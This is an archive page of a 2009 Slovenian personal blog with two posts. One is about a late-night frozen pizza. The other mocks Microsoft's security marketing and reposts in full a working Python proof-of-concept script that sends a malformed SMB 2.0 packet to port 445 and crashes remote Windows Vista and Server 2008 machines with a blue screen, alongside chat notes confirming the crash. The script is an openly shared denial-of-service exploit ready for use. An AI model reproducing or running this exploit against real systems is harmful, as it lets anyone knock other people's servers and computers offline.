Archive

Archive for September, 2009

(After) Midnight snack

September 20th, 2009
No comments

Sori… vem da me bo zdj vsak lačen človek poslal v p.m., ampak, sori… mogu sm :)

Ko geekaš sred noči… (ker maš sfukan bioritem, in je to zate šele pozno popoldne), postaneš lačen. In kaj je najlažje pripravit? Pico! Seveda zmrznjeno…, ker sem len, in se mi ne da mesit testa, in se zaje***vat z vsem,… Na slikah je pica s salamo (neka hoferjeva, za cca 1.5eur), čez je dodanega mal navadnega sira, mozarella, in uni luškani mini paradajzki :)

slika prej:

pica nepečena

in še spečena:

pečena pica

Nomnomnom :D

ps: aja.. dodau sm tud olive.. une ta manjše so s papriko, una ena tavečja ma pa cel strok česna (moral sem spraznit kozarce (mam še dva cela buhaha))

pps: pica je bila pečena ob cca 3:04h, torej je kar malo več after midnight

crap , ,

Windows 7, security, Linux, patchi, in en 0-day

September 8th, 2009
No comments

Pred par dnevi je na slashdotu pojavil topic1  o Microsoftovih training slajdih, kjer so BestBuy zaposlene izobraževali kok je Win7 “ql”, in kok je Linux “beden”.  Konkreten slajd, ki mi je privlekel pozornost je bil tudi:

Linux11 security

Torej… ko pride do kakega grdega b00ga, exploita ipd, so userji “on their own”, če uporabljajo Microsoft priozvode, so pa “safe and secure”…

No in danes mi je @Kostko poslal zanimiv link (click here), kjer se nahaja kratka python skripta, ki na oddaljeni mašini sproži BSOD.  In kako je sedaj z ‘zagarantirano varnostjo’? Citiram:

Vendor contacted, but no patch available for the moment. Close SMB feature and ports, until a patch is provided.

Hmm.. očitno bo najbolje da izklopimo M$ file serverje, zakurimo ogenj in čakamo :)

In za vsak slučaj, da ne bi exploit kam izginil, dajem kopijo sem:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
 
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
 
)
s = socket()
 
s.connect(host)
s.send(buff)
s.close()

ps:  zadeva se je pojavila tudi na slashdotu (click here)

pps:

(21:19:09) Anze: na zobavniku potrjeno bsod dela na visti
(21:19:12) Anze: win7 je safe <--????
(21:19:16) Anze: win 2k8 pade

  1. zaradi photobucketa se slik več ne vidi, zato sem postavil mirror tule

geek stuff, rant , , , ,